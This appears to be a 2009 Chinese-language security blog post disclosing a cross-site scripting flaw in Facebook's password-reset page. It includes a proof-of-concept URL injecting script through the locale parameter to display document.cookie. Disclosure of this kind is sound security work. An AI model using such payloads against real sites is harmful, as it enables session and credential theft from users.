Facebook“重置密码”页面有重大XSS漏洞 | ART HACKER

Support Us “Click here to get donations, your support, we will be more powerful!”

Free Download TemplateART.HACKER

WP WebHost “50GBs of web space,500GBs of monthly bandwidth,Only $5/month!”

Facebook“重置密码”页面有重大XSS漏洞

Posted by ArtHack on Jan 5th, 2009 and filed under Notice loopholes. You can follow any responses to this entry through the RSS 2.0. You can also subscribe to us, through the Top of the E-mail - 加入超级QQ群:32843311

我们再次发现了一种新的重要的跨站点脚本漏洞影响Facebook的“ 重置密码 ”页面。

恶意用户可以注入代码，诱骗证书和其他敏感的个人信息从数以百万计的Facebook的成员。

我们希望，这一严重缺陷尽快得到解决。

XSS:
http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

截图：

facebook resetpwd

Classic Posts

Related Posts

Our Sponsors

Leave a Reply

Our Sponsors

Translator

Log in / Art Hack.All rights reserved.